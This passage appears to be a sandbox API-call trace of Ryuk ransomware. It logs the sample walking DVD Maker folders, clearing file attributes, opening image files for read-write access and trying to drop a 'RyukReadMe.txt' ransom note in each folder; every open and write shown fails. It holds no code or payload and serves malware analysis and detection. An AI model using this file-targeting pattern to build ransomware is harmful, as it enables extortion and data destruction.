returned 0xffffffffffffffff [0133.464] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.464] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.464] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.464] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", dwFileAttributes=0x80) returned 0 [0133.465] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.465] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.465] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.465] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.465] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.465] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", dwFileAttributes=0x80) returned 0 [0133.466] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.466] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.466] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.466] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.466] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.466] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", dwFileAttributes=0x80) returned 0 [0133.466] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.466] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.466] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.466] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.466] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.467] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.467] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.467] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.467] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.467] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.467] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.467] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", dwFileAttributes=0x80) returned 0 [0133.467] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.467] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.467] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.468] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.468] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.468] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx", dwFileAttributes=0x80) returned 0 [0133.468] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dvdtransform.fx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.468] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.468] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.468] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.468] SetLastError (dwErrCode=0x0) [0133.468] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.468] GetLastError () returned 0x5 [0133.468] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.468] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.468] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.470] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.470] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.470] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.470] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.470] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.471] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.471] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.471] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.471] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.471] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0133.471] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.472] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.472] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.472] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.472] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.472] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.480] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.480] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.480] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.480] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.480] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.480] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.481] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.481] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.481] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.481] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.481] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.481] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.482] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.482] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.482] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.482] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.482] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.482] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.483] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.483] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.483] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.483] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.483] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.483] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.484] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.484] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.484] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.484] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.484] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.485] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.485] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.485] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.486] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.486] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.486] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.486] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png", dwFileAttributes=0x80) returned 0 [0133.486] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\pagecurl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.486] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.486] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.486] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.486] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.487] SetLastError (dwErrCode=0x0) [0133.487] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.490] GetLastError () returned 0x5 [0133.490] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.490] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.490] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.490] SetLastError (dwErrCode=0x0) [0133.490] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.490] GetLastError () returned 0x5 [0133.490] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.490] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.490] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.492] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.492] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.492] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.492] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.493] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.493] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.493] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.493] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.493] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.493] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0133.494] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.494] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.494] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.494] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.494] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.494] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png", dwFileAttributes=0x80) returned 0 [0133.495] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotsdarkoverlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.495] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.495] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.495] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.495] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.495] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png", dwFileAttributes=0x80) returned 0 [0133.495] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotslightoverlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.495] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.495] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.496] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.496] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.496] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png", dwFileAttributes=0x80) returned 0 [0133.496] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\full.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.497] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.497] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.497] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.497] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.497] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.497] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.498] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.498] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.498] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.498] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.498] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.498] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.499] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.499] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.499] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.499] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.499] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.500] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.500] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.500] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.500] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.500] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.500] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.501] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.501] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.501] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.501] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.501] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.501] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.502] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 